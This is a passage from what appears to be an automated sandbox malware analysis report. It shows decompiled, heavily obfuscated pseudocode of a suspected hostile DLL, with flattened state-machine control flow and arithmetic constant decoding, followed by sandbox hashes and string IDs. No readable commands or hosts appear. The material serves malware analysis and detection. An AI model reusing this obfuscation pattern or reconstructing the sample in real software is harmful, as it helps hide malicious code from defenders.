                          										_t743 = E00D3BFBE( &_v2604, _t867, _v2700);
                          										_pop(_t783);
                          										__eflags = _t743;
                          										if(__eflags != 0) {
                          											_t861 = 0xf749c26;
                          											continue;
                          										}
                          									} else {
                          										if(_t861 == 0x240e9e1) {
                          											return E00D51538(_v2744, _v2868, _v2628);
                          										}
                          										if(_t861 != 0x2876e66) {
                          											goto L25;
                          										} else {
                          											_t743 = E00D52B09(_v2768, _t860, _v2672, _v2732);
                          											_pop(_t783);
                          											_t861 = 0x6dbb171;
                          											continue;
                          										}
                          										L29:
                          									}
                          								}
                          							}
                          						}
                          						L28:
                          						return _t743;
                          						goto L29;
                          					}
                          					__eflags = _t861 - 0x9e42b00;
                          					if(_t861 == 0x9e42b00) {
                          						_t732 = E00D50A64(_v2632, _v2636, _v2876, _v2748);
                          						_t860 = _t732;
                          						_pop(_t783);
                          						__eflags = _t732;
                          						if(__eflags == 0) {
                          							_t861 = 0x6dbb171;
                          							goto L25;
                          						} else {
                          							_t861 = 0xb8f10d;
                          							goto L1;
                          						}
                          						goto L29;
                          					} else {
                          						__eflags = _t861 - 0xa108a7f;
                          						if(_t861 == 0xa108a7f) {
                          							_t659 =  &_v2756; // 0x33367e
                          							_t733 = E00D4D8DB( &_v2628,  &_v2636,  *_t659, _v2680);
                          							asm("sbb esi, esi");
                          							_pop(_t783);
                          							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
                          							goto L1;
                          						} else {
                          							__eflags = _t861 - 0xbf2cce3;
                          							if(_t861 == 0xbf2cce3) {
                          								_t653 =  &_v2764; // 0x33367e
                          								_t783 = _v2688;
                          								E00D31A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
                          								_t868 =  &(_t868[8]);
                          								_t861 = 0x1d2207b;
                          								goto L1;
                          							} else {
                          								__eflags = _t861 - 0xf749c26;
                          								if(_t861 != 0xf749c26) {
                          									goto L25;
                          								} else {
                          									_v2624 = E00D40CF9();
                          									_t758 = E00D400C5(_t757, _v2824, _v2832);
                          									_pop(_t804);
                          									_v2620 = 2 + _t758 * 2;
                          									_t783 = _v2792;
                          									_t743 = E00D3F726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
                          									_t868 =  &(_t868[0xc]);
                          									__eflags = _t743;
                          									if(__eflags != 0) {
                          										_t861 = 0xa108a7f;
                          										goto L1;
                          									}
                          								}
                          							}
                          						}
                          					}
                          					goto L28;
                          					L25:
                          					__eflags = _t861 - 0x7aa6196;
                          				} while (__eflags != 0);
                          				return _t743;
                          			}

                          0x00d3b6a9
                          0x00d3b6c3
                          0x00d3b6ca
                          0x00d3b6cf
                          0x00d3b6ed
                          0x00d3b71c
                          0x00d3b723
                          0x00d3b728
                          0x00d3b72b
                          0x00d3b72d
                          0x00d3b733
                          0x00000000
                          0x00d3b733
                          0x00d3b72d
                          0x00d3b6a3
                          0x00d3b697
                          0x00d3b68b
                          0x00000000
                          0x00d3b7ef
                          0x00d3b7ef
                          0x00d3b7ef
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
                          • API String ID: 0-4215899151
                          • Opcode ID: 437e79085a0c3c7316feddeb10dc2faf93a77836d578da1f9a1a63f51bf7eb6d
                          • Instruction ID: 12eb04fea85fa2ad0fffa51b9f8f169ad11437e358c74b61e12df0fff0c4f440
                          • Opcode Fuzzy Hash: 437e79085a0c3c7316feddeb10dc2faf93a77836d578da1f9a1a63f51bf7eb6d
                          • Instruction Fuzzy Hash: BE72EE725083819FD378CF21D54AB8BBBE2FBC4314F10891EE6D996260DBB19948CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [Figure: control-flow graph of the function at 0xd40f86; legend: Executed / Not Executed]
                          C-Code - Quality: 96%
                          			E00D40F86(intOrPtr* __ecx) {
                          				char _v68;
                          				char _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				intOrPtr _v88;
                          				intOrPtr _v92;
                          				intOrPtr* _v96;
                          				char _v100;
                          				char _v104;
                          				char _v108;
                          				char _v112;
                          				char _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				signed int _v212;
                          				signed int _v216;
                          				signed int _v220;
                          				signed int _v224;
                          				signed int _v228;
                          				signed int _v232;
                          				signed int _v236;
                          				signed int _v240;
                          				signed int _v244;
                          				signed int _v248;
                          				signed int _v252;
                          				signed int _v256;
                          				signed int _v260;
                          				signed int _v264;
                          				signed int _v268;
                          				signed int _v272;
                          				signed int _v276;
                          				signed int _v280;
                          				signed int _v284;
                          				signed int _v288;
                          				signed int _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				signed int _v312;
                          				signed int _v316;
                          				signed int _v320;
                          				signed int _v324;
                          				signed int _v328;
                          				signed int _v332;
                          				signed int _v336;
                          				signed int _v340;
                          				signed int _v344;
                          				signed int _v348;
                          				signed int _v352;
                          				signed int _v356;
                          				signed int _v360;
                          				signed int _v364;
                          				signed int _v368;
                          				signed int _v372;
                          				signed int _v376;
                          				signed int _v380;
                          				signed int _v384;
                          				signed int _v388;
                          				signed int _v392;
                          				signed int _v396;
                          				signed int _v400;
                          				signed int _v404;
                          				signed int _v408;
                          				signed int _v412;
                          				signed int _v416;
                          				signed int _v420;
                          				signed int _v424;
                          				signed int _v428;
                          				signed int _v432;
                          				signed int _v436;
                          				signed int _v440;
                          				void* _t824;
                          				void* _t825;
                          				void* _t829;
                          				void* _t832;
                          				void* _t844;
                          				void* _t850;
                          				void* _t853;
                          				signed int _t860;
                          				signed int _t861;
                          				signed int _t862;
                          				signed int _t863;
                          				signed int _t864;
                          				signed int _t865;
                          				signed int _t866;
                          				signed int _t867;
                          				signed int _t868;
                          				signed int _t869;
                          				signed int _t870;
                          				signed int _t871;
                          				signed int _t872;
                          				signed int _t873;
                          				signed int _t874;
                          				signed int _t875;
                          				signed int _t876;
                          				void* _t882;
                          				void* _t901;
                          				void* _t957;
                          				intOrPtr _t975;
                          				intOrPtr* _t978;
                          				signed int _t980;
                          				signed int _t981;
                          				void* _t982;
                          				intOrPtr _t986;
                          				void* _t987;
                          				void* _t994;
                          				void* _t996;
                          
                          				_t978 = __ecx;
                          				_v96 = __ecx;
                          				_v88 = 0xce16ef;
                          				_t986 = 0;
                          				_t853 = 0x87433f6;
                          				_v84 = 0;
                          				_v80 = 0;
                          				_v412 = 0xef09b0;
                          				_v412 = _v412 + 0xffff239a;
                          				_v412 = _v412 >> 0xe;
                          				_v412 = _v412 + 0xffffb1af;
                          				_v412 = _v412 ^ 0xffffb567;
                          				_v144 = 0xb2550e;
                          				_v144 = _v144 << 6;
                          				_v144 = _v144 ^ 0x2c954380;
                          				_v160 = 0xa1df5c;
                          				_v160 = _v160 * 0x60;
                          				_v160 = _v160 ^ 0x3cb3c280;
                          				_v288 = 0x7a32d8;
                          				_v288 = _v288 | 0x8c6c9666;
                          				_v288 = _v288 ^ 0x041f8caf;
                          				_v288 = _v288 ^ 0x88613a51;
                          				_v348 = 0xdf5e12;
                          				_v348 = _v348 | 0xa5ea5eb7;
                          				_v348 = _v348 ^ 0xa5ff5eb7;
                          				_v296 = 0x7009ff;
                          				_v296 = _v296 + 0xffff1527;
                          				_v296 = _v296 + 0x576a;
                          				_v296 = _v296 ^ 0x006f7690;
                          				_v372 = 0x1f54b;
                          				_t860 = 0x52;
                          				_v372 = _v372 * 0x5a;
                          				_v372 = _v372 >> 0xb;
                          				_v372 = _v372 / _t860;
                          				_v372 = _v372 ^ 0x00000044;
                          				_v332 = 0x772df1;
                          				_v332 = _v332 + 0x4853;
                          				_v332 = _v332 ^ 0x166147d5;
                          				_v332 = _v332 ^ 0x16163191;
                          				_v240 = 0x1a1abb;
                          				_v240 = _v240 ^ 0xbdfc81b5;
                          				_v240 = _v240 | 0x1ef02f35;
                          				_v240 = _v240 ^ 0xbff6bf3f;
                          				_v232 = 0x620327;
                          				_v232 = _v232 + 0xffffc934;
                          				_t861 = 0x13;
                          				_v232 = _v232 / _t861;
                          				_v232 = _v232 ^ 0x000525b3;
                          				_v208 = 0xe2fff2;
                          				_t980 = 0x39;
                          				_v208 = _v208 * 0x78;
                          				_v208 = _v208 ^ 0x6a67f970;
                          				_v344 = 0xf3734c;
                          				_v344 = _v344 >> 0x10;
                          				_v344 = _v344 / _t980;
                          				_v344 = _v344 ^ 0x00000004;
                          				_v300 = 0x170e40;
                          				_v300 = _v300 | 0xfbde795f;
                          				_v300 = _v300 ^ 0xfbde9330;
                          				_v260 = 0xd4f3ae;
                          				_v260 = _v260 ^ 0x9e22b963;
                          				_v260 = _v260 * 0x2e;
                          				_v260 = _v260 ^ 0x904fea8f;
                          				_v356 = 0x4c8d9b;
                          				_v356 = _v356 | 0xd47535dd;
                          				_v356 = _v356 + 0xffffd433;
                          				_t862 = 0x64;
                          				_v356 = _v356 * 0x59;
                          				_v356 = _v356 ^ 0xdfa15942;
                          				_v308 = 0xbd9260;
                          				_v308 = _v308 >> 0xe;
                          				_v308 = _v308 * 0x79;
                          				_v308 = _v308 ^ 0x000cbe7b;
                          				_v252 = 0xa2f51d;
                          				_v252 = _v252 + 0x749;
                          				_v252 = _v252 << 0xd;
                          				_v252 = _v252 ^ 0x5f854687;
                          				_v292 = 0x216e58;
                          				_v292 = _v292 / _t862;
                          				_v292 = _v292 + 0xffff8880;
                          				_v292 = _v292 ^ 0xfff3b1bc;
                          				_v176 = 0xac4eb4;
                          				_v176 = _v176 | 0xd866b52c;
                          				_v176 = _v176 ^ 0xd8e8b8b7;
                          				_v236 = 0x7a6201;
                          				_v236 = _v236 ^ 0x2461ec4e;
                          				_t863 = 0xa;
                          				_v236 = _v236 * 0x35;
                          				_v236 = _v236 ^ 0x79bb4b53;
                          				_v220 = 0xf5a9fb;
                          				_v220 = _v220 << 1;
                          				_v220 = _v220 >> 5;
                          				_v220 = _v220 ^ 0x000a39a7;
                          				_v380 = 0x7beff6;
                          				_v380 = _v380 / _t863;
                          				_v380 = _v380 | 0x5a206f9b;
                          				_v380 = _v380 * 0x3d;
                          				_v380 = _v380 ^ 0x7c9823d9;
                          				_v284 = 0xdc7201;
                          				_v284 = _v284 ^ 0xec4f9d75;
                          				_v284 = _v284 << 8;
                          				_v284 = _v284 ^ 0x93e140b6;
                          				_v396 = 0x36b797;
                          				_v396 = _v396 + 0x83f2;
                          				_v396 = _v396 | 0xb5da4ffa;
                          				_v396 = _v396 ^ 0x8c9f27f1;
                          				_v396 = _v396 ^ 0x3962cb66;
                          				_v364 = 0x608af6;
                          				_v364 = _v364 >> 0xe;
                          				_v364 = _v364 ^ 0xb06c2668;
                          				_v364 = _v364 >> 0xa;
                          				_v364 = _v364 ^ 0x0022b374;
                          				_v404 = 0xe18b1f;
                          				_v404 = _v404 + 0xffff49de;
                          				_v404 = _v404 + 0xffffa950;
                          				_v404 = _v404 >> 5;
                          				_v404 = _v404 ^ 0x000802e7;
                          				_v168 = 0x720eed;
                          				_v168 = _v168 | 0xf4577aa8;
                          				_v168 = _v168 ^ 0xf4704e8f;
                          				_v328 = 0x5e39f;
                          				_v328 = _v328 * 0x2a;
                          				_v328 = _v328 ^ 0x47860790;
                          				_v328 = _v328 ^ 0x47706e69;
                          				_v336 = 0xdd3db6;
                          				_v336 = _v336 ^ 0x0be1064e;
                          				_v336 = _v336 ^ 0xe0fa941c;
                          				_v336 = _v336 ^ 0xebc1ff07;
                          				_v340 = 0x8bacdf;
                          				_t864 = 0x49;
                          				_v340 = _v340 / _t864;
                          				_t865 = 0x77;
                          				_v340 = _v340 * 0x4d;
                          				_v340 = _v340 ^ 0x0099a7e7;
                          				_v440 = 0x29fcf0;
                          				_v440 = _v440 >> 4;
                          				_v440 = _v440 ^ 0x37539152;
                          				_v440 = _v440 / _t865;
                          				_v440 = _v440 ^ 0x007580f6;
                          				_v400 = 0x753dd5;
                          				_v400 = _v400 ^ 0x142a6b84;
                          				_v400 = _v400 ^ 0x6d30c2ad;
                          				_v400 = _v400 ^ 0xe014bebf;
                          				_v400 = _v400 ^ 0x997c2220;
                          				_v128 = 0x8b3cd;
                          				_v128 = _v128 << 2;
                          				_v128 = _v128 ^ 0x002b9a55;
                          				_v408 = 0x5fd2f;
                          				_v408 = _v408 >> 9;
                          				_t866 = 0x69;
                          				_v408 = _v408 * 0x53;
                          				_v408 = _v408 * 0x58;
                          				_v408 = _v408 ^ 0x00501640;
                          				_v416 = 0x7e5e32;
                          				_v416 = _v416 | 0x37c3b1cb;
                          				_v416 = _v416 + 0x4e4b;
                          				_v416 = _v416 | 0xc7e68b70;
                          				_v416 = _v416 ^ 0xffec3e94;
                          				_v304 = 0xac72e0;
                          				_v304 = _v304 + 0xffff9516;
                          				_v304 = _v304 | 0x0ab72207;
                          				_v304 = _v304 ^ 0x0aba1474;
                          				_v424 = 0x91a63a;
                          				_v424 = _v424 | 0xeda6ffa9;
                          				_v424 = _v424 ^ 0xa7761782;
                          				_v424 = _v424 << 0xe;
                          				_v424 = _v424 ^ 0x7a08e30a;
                          				_v436 = 0x9e7f8b;
                          				_v436 = _v436 | 0x84ca61f6;
                          				_v436 = _v436 << 2;
                          				_v436 = _v436 * 0x3e;
                          				_v436 = _v436 ^ 0xb78cfbfa;
                          				_v216 = 0x303808;
                          				_v216 = _v216 + 0xef78;
                          				_v216 = _v216 / _t980;
                          				_v216 = _v216 ^ 0x000455e2;
                          				_v312 = 0x19b522;
                          				_v312 = _v312 << 7;
                          				_v312 = _v312 ^ 0x11162953;
                          				_v312 = _v312 ^ 0x1dcfd305;
                          				_v212 = 0x8a6fc0;
                          				_v212 = _v212 << 9;
                          				_v212 = _v212 ^ 0x14d4ca12;
                          				_v276 = 0xdb7845;
                          				_v276 = _v276 / _t866;
                          				_v276 = _v276 * 0x1c;
                          				_v276 = _v276 ^ 0x003237f1;
                          				_v124 = 0x91e545;
                          				_t867 = 0x7b;
                          				_v124 = _v124 / _t867;
                          				_v124 = _v124 ^ 0x0004745c;
                          				_v192 = 0x2154b3;
                          				_v192 = _v192 ^ 0x5324a52c;
                          				_v192 = _v192 ^ 0x530d1a47;
                          				_v140 = 0x7913eb;
                          				_v140 = _v140 | 0xe487e648;
                          				_v140 = _v140 ^ 0xe4fd51cb;
                          				_v428 = 0x8a554f;
                          				_v428 = _v428 << 1;
                          				_v428 = _v428 + 0xffff493d;
                          				_v428 = _v428 | 0x8f4663f4;
                          				_v428 = _v428 ^ 0x8f592165;
                          				_v200 = 0x5c4830;
                          				_v200 = _v200 + 0xffffe35d;
                          				_v200 = _v200 ^ 0x00549f8c;
                          				_v132 = 0x6e2e79;
                          				_t377 =  &_v132; // 0x6e2e79
                          				_t981 = 0x62;
                          				_v132 =  *_t377 / _t981;
                          				_v132 = _v132 ^ 0x000a369f;
                          				_v244 = 0x1d0d9a;
                          				_t868 = 0x6e;
                          				_v244 = _v244 / _t868;
                          				_v244 = _v244 ^ 0xec9a9004;
                          				_v244 = _v244 ^ 0xec94e609;
                          				_v148 = 0xd4a92;
                          				_v148 = _v148 + 0xffffbc3f;
                          				_v148 = _v148 ^ 0x00088ca7;
                          				_v184 = 0x3666a0;
                          				_v184 = _v184 >> 0xb;
                          				_v184 = _v184 ^ 0x00096f18;
                          				_v228 = 0x713966;
                          				_v228 = _v228 << 3;
                          				_v228 = _v228 << 0xb;
                          				_v228 = _v228 ^ 0x4e5b426e;
                          				_v316 = 0xec09e9;
                          				_v316 = _v316 << 7;
                          				_t869 = 0x78;
                          				_v316 = _v316 / _t869;
                          				_v316 = _v316 ^ 0x00fe5880;
                          				_v268 = 0x8ffe81;
                          				_v268 = _v268 + 0xffff4311;
                          				_v268 = _v268 ^ 0x56e15418;
                          				_v268 = _v268 ^ 0x566a144b;
                          				_v324 = 0x9f4c2e;
                          				_v324 = _v324 >> 4;
                          				_v324 = _v324 | 0x903f3b4d;
                          				_v324 = _v324 ^ 0x9031b6d7;
                          				_v196 = 0x6080cf;
                          				_v196 = _v196 << 0xe;
                          				_v196 = _v196 ^ 0x203ba000;
                          				_v256 = 0x4bba45;
                          				_v256 = _v256 + 0xc17c;
                          				_v256 = _v256 | 0x95e268b8;
                          				_v256 = _v256 ^ 0x95e68234;
                          				_v264 = 0x7821fc;
                          				_v264 = _v264 << 3;
                          				_t870 = 0x34;
                          				_v264 = _v264 / _t870;
                          				_v264 = _v264 ^ 0x001694e5;
                          				_v204 = 0x96f3a5;
                          				_v204 = _v204 * 0x24;
                          				_v204 = _v204 ^ 0x153e3a4b;
                          				_v368 = 0xbef911;
                          				_t871 = 0xe;
                          				_v368 = _v368 / _t871;
                          				_v368 = _v368 >> 0xb;
                          				_v368 = _v368 + 0x5de4;
                          				_v368 = _v368 ^ 0x00021c01;
                          				_v376 = 0x377d04;
                          				_v376 = _v376 + 0xcef;
                          				_v376 = _v376 ^ 0x9e466b70;
                          				_t872 = 0x59;
                          				_v376 = _v376 * 0x6b;
                          				_v376 = _v376 ^ 0x399834bf;
                          				_v180 = 0x6632ea;
                          				_v180 = _v180 | 0x3a3e38fd;
                          				_v180 = _v180 ^ 0x3a73a81b;
                          				_v248 = 0x142cd9;
                          				_v248 = _v248 / _t872;
                          				_v248 = _v248 / _t981;
                          				_v248 = _v248 ^ 0x0001d965;
                          				_v188 = 0x88b8e9;
                          				_v188 = _v188 + 0xffff5f5f;
                          				_v188 = _v188 ^ 0x0087927e;
                          				_v164 = 0x9c013d;
                          				_t873 = 0xa;
                          				_v164 = _v164 / _t873;
                          				_v164 = _v164 ^ 0x0004ead6;
                          				_v172 = 0x53b5f1;
                          				_v172 = _v172 + 0xd9f2;
                          				_v172 = _v172 ^ 0x005588af;
                          				_v360 = 0xd6ac8a;
                          				_v360 = _v360 | 0xfdf9fa5f;
                          				_v360 = _v360 ^ 0xfdfecc4d;
                          				_v224 = 0xfb951e;
                          				_v224 = _v224 + 0xffff2e4c;
                          				_v224 = _v224 + 0x8dcd;
                          				_v224 = _v224 ^ 0x00f1d24a;
                          				_v272 = 0x6e5d6f;
                          				_v272 = _v272 << 2;
                          				_t874 = 0x6f;
                          				_v272 = _v272 / _t874;
                          				_v272 = _v272 ^ 0x000d7a86;
                          				_v384 = 0x15dc31;
                          				_v384 = _v384 + 0xfffffc55;
                          				_v384 = _v384 << 0x10;
                          				_v384 = _v384 >> 0xa;
                          				_v384 = _v384 ^ 0x003c4753;
                          				_v392 = 0x7bc513;
                          				_v392 = _v392 * 0x54;
                          				_v392 = _v392 | 0xe01c3b63;
                          				_v392 = _v392 + 0xe1b2;
                          				_v392 = _v392 ^ 0xe89c6b16;
                          				_v420 = 0x6862b7;
                          				_v420 = _v420 ^ 0x841c6550;
                          				_v420 = _v420 + 0xd52;
                          				_v420 = _v420 >> 0x10;
                          				_v420 = _v420 ^ 0x000e8d54;
                          				_v388 = 0x19484a;
                          				_t982 = 0x6f661e6;
                          				_t875 = 0x68;
                          				_v388 = _v388 / _t875;
                          				_t876 = 0xd;
                          				_v92 = 0x100;
                          				_v388 = _v388 * 0x61;
                          				_v388 = _v388 << 6;
                          				_v388 = _v388 ^ 0x05e5c873;
                          				_v432 = 0xb160;
                          				_v432 = _v432 * 0x78;
                          				_v432 = _v432 >> 8;
                          				_v432 = _v432 ^ 0xee0de4a9;
                          				_v432 = _v432 ^ 0xee0e3c37;
                          				_v320 = 0x436488;
                          				_v320 = _v320 * 0x7d;
                          				_v320 = _v320 * 0x24;
                          				_v320 = _v320 ^ 0xa0a81f1c;
                          				_v136 = 0x73af31;
                          				_v136 = _v136 >> 0xf;
                          				_v136 = _v136 ^ 0x0004ab53;
                          				_v120 = 0xd23217;
                          				_v120 = _v120 | 0x86b48086;
                          				_v120 = _v120 ^ 0x86fe303d;
                          				_v280 = 0x567562;
                          				_v280 = _v280 / _t876;
                          				_v280 = _v280 + 0xffff7ef5;
                          				_v280 = _v280 ^ 0x00098751;
                          				_v152 = 0x24c9f6;
                          				_v152 = _v152 + 0x7f22;
                          				_v152 = _v152 ^ 0x002f2944;
                          				_v156 = 0xe548b;
                          				_v156 = _v156 + 0xe219;
                          				_v156 = _v156 ^ 0x000a95de;
                          				_v352 = 0xccf4e9;
                          				_v352 = _v352 | 0x0ed71748;
                          				_v352 = _v352 + 0xefd9;
                          				_v352 = _v352 << 3;
                          				_v352 = _v352 ^ 0x770f1835;
                          				while(1) {
                          					L1:
                          					while(1) {
                          						L2:
                          						while(1) {
                          							L3:
                          							_t957 = 0xaefec99;
                          							do {
                          								while(1) {
                          									L4:
                          									_t996 = _t853 - 0x89f995e;
                          									if(_t996 > 0) {
                          										break;
                          									}
                          									if(_t996 == 0) {
                          										E00D4C237(_v108, _v432, _v320, _v136);
                          										_t853 = 0xc502d5f;
                          										while(1) {
                          											L1:
                          											goto L2;
                          										}
                          									} else {
                          										if(_t853 == 0x49f634) {
                          											_push(_v308);
                          											_push(_v356);
                          											_push(_v260);
                          											_t832 = E00D4E1F8(0xd313d8, _v300, __eflags);
                          											_push(_v236);
                          											_push(_v176);
                          											_push(_v292);
                          											__eflags = E00D3738A(_v220, _t832, _v380, _v412,  &_v112, E00D4E1F8(0xd31318, _v252, __eflags), _v284) - _v144;
                          											_t853 =  ==  ? 0xc917448 : 0x468e224;
                          											E00D4FECB(_t832, _v396, _v364, _v404, _v168);
                          											E00D4FECB(_t833, _v328, _v336, _v340, _v440);
                          											_t978 = _v96;
                          											_t987 = _t987 + 0x44;
                          											goto L31;
                          										} else {
                          											if(_t853 == 0x1281fcd) {
                          												E00D32EBF(_v420, _v104, _v388);
                          												_t853 = 0x89f995e;
                          												while(1) {
                          													L1:
                          													goto L2;
                          												}
                          											} else {
                          												if(_t853 == _t824) {
                          													_push(_v212);
                          													_push(_v312);
                          													_push(_v216);
                          													_t985 = E00D4E1F8(0xd31368, _v436, __eflags);
                          													_t901 = 0x48;
                          													_v100 = 0xd31368;
                          													_t844 = E00D516C0(_v276, 0xd31368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
                          													_t994 = _t987 + 0x3c;
                          													__eflags = _t844 - _v332;
                          													if(_t844 != _v332) {
                          														_t853 = 0xc502d5f;
                          													} else {
                          														_t975 =  *0xd56224; // 0x0
                          														E00D4C9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
                          														_t994 = _t994 + 0x10;
                          														_t853 = 0x9badbc8;
                          													}
                          													E00D4FECB(_t985, _v228, _v316, _v268, _v324);
                          													_t987 = _t994 + 0xc;
                          													L31:
                          													_t982 = 0x6f661e6;
                          													_t824 = 0x38eaa65;
                          													_t882 = 0xe81b6a7;
                          													_t957 = 0xaefec99;
                          													goto L32;
                          												} else {
                          													if(_t853 == 0x5c5114f) {
                          														E00D3F7FE(_v156, _v112, _v352, _v344);
                          													} else {
                          														if(_t853 == _t982) {
                          															_t850 = E00D33431(_v104);
                          															_t853 = 0x1281fcd;
                          															__eflags = _t850;
                          															_t986 =  !=  ? 1 : _t986;
                          															while(1) {
                          																L1:
                          																L2:
                          																L3:
                          																_t957 = 0xaefec99;
                          																goto L4;
                          															}
                          														} else {
                          															if(_t853 != 0x87433f6) {
                          																goto L32;
                          															} else {
                          																_t853 = 0x49f634;
                          																continue;
                          															}
                          														}
                          													}
                          												}
                          											}
                          										}
                          									}
                          									L35:
                          									return _t986;
                          								}
                          								__eflags = _t853 - 0x9badbc8;
                          								if(__eflags == 0) {
                          									_push(_v204);
                          									_push(_v264);
                          									_push(_v256);
                          									__eflags = E00D3BC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E00D4E1F8(0xd31368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0xd31368, _v188) - _v232;
                          									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
                          									E00D4FECB(_t819, _v164, _v172, _v360, _v224);
                          									_t987 = _t987 + 0x40;
                          									goto L31;
                          								} else {
                          									__eflags = _t853 - _t957;
                          									if(_t853 == _t957) {
                          										_t825 = E00D351E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
                          										_t987 = _t987 + 0x14;
                          										__eflags = _t825;
                          										_t853 =  ==  ? _t982 : 0x89f995e;
                          										goto L1;
                          									} else {
                          										__eflags = _t853 - 0xc502d5f;
                          										if(_t853 == 0xc502d5f) {
                          											E00D4C237(_v116, _v120, _v280, _v152);
                          											_t853 = 0x5c5114f;
                          											while(1) {
                          												L1:
                          												goto L2;
                          											}
                          										} else {
                          											__eflags = _t853 - 0xc917448;
                          											if(_t853 == 0xc917448) {
                          												_v100 = _v92;
                          												_t829 = E00D543E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
                          												_t987 = _t987 + 0x18;
                          												__eflags = _t829 - _v288;
                          												_t882 = 0xe81b6a7;
                          												_t824 = 0x38eaa65;
                          												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
                          												goto L3;
                          											} else {
                          												__eflags = _t853 - _t882;
                          												if(_t853 != _t882) {
                          													goto L32;
                          												} else {
                          													__eflags = E00D4C2CF(_v304, _v348, _v424, _v116) - _v296;
                          													_t824 = 0x38eaa65;
                          													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
                          													goto L2;
                          												}
                          											}
                          										}
                          									}
                          								}
                          								goto L35;
                          								L32:
                          								__eflags = _t853 - 0x468e224;
                          							} while (__eflags != 0);
                          							goto L35;
                          						}
                          					}
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
                          • API String ID: 0-421492616
                          • Opcode ID: a915ba2daf16c568811c91dde7698064839b3b0a982ab7f1e2ba3a36e8590447
                          • Instruction ID: 732d0e5d796bba77e27f2f5623b560a5ea8f6d3db9ffade173588e028daec9b1
                          • Opcode Fuzzy Hash: a915ba2daf16c568811c91dde7698064839b3b0a982ab7f1e2ba3a36e8590447
                          • Instruction Fuzzy Hash: D892FE715093818FD379CF61C98AB9BBBE2FBC4304F10891DE69A86260D7B18949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E00D42E5D(int __ecx, signed int __edx) {
                          				char _v128;
                          				char _v256;
                          				char _v288;
                          				intOrPtr _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				signed int _v312;
                          				signed int _v316;
                          				signed int _v320;
                          				signed int _v324;
                          				signed int _v328;
                          				signed int _v332;
                          				signed int _v336;
                          				signed int _v340;
                          				signed int _v344;
                          				unsigned int _v348;
                          				signed int _v352;
                          				signed int _v356;
                          				signed int _v360;
                          				signed int _v364;
                          				signed int _v368;
                          				signed int _v372;
                          				signed int _v376;
                          				signed int _v380;
                          				signed int _v384;
                          				signed int _v388;
                          				signed int _v392;
                          				unsigned int _v396;
                          				signed int _v400;
                          				signed int _v404;
                          				signed int _v408;
                          				signed int _v412;
                          				signed int _v416;
                          				signed int _v420;
                          				signed int _v424;
                          				signed int _v428;
                          				signed int _v432;
                          				signed int _v436;
                          				signed int _v440;
                          				signed int _v444;
                          				signed int _v448;
                          				signed int _v452;
                          				signed int _v456;
                          				signed int _v460;
                          				signed int _v464;
                          				signed int _v468;
                          				signed int _v472;
                          				unsigned int _v476;
                          				int _v480;
                          				signed int _v484;
                          				signed int _v488;
                          				signed int _v492;
                          				signed int _v496;
                          				signed int _v500;
                          				signed int _v504;
                          				signed int _v508;
                          				signed int _v512;
                          				signed int _v516;
                          				signed int _v520;
                          				signed int _v524;
                          				signed int _v528;
                          				unsigned int _v532;
                          				signed int _v536;
                          				signed int _v540;
                          				signed int _v544;
                          				signed int _v548;
                          				unsigned int _v552;
                          				signed int _v556;
                          				signed int _v560;
                          				signed int _v564;
                          				signed int _v568;
                          				signed int _v572;
                          				unsigned int _v576;
                          				void* _t707;
                          				void* _t708;
                          				signed int _t718;
                          				signed int _t732;
                          				signed int _t737;
                          				int _t740;
                          				void* _t742;
                          				void* _t750;
                          				signed int _t752;
                          				signed int _t758;
                          				signed int _t768;
                          				signed int _t769;
                          				intOrPtr _t770;
                          				int _t774;
                          				signed int _t786;
                          				void* _t832;
                          				void* _t833;
                          				void* _t836;
                          				void* _t837;
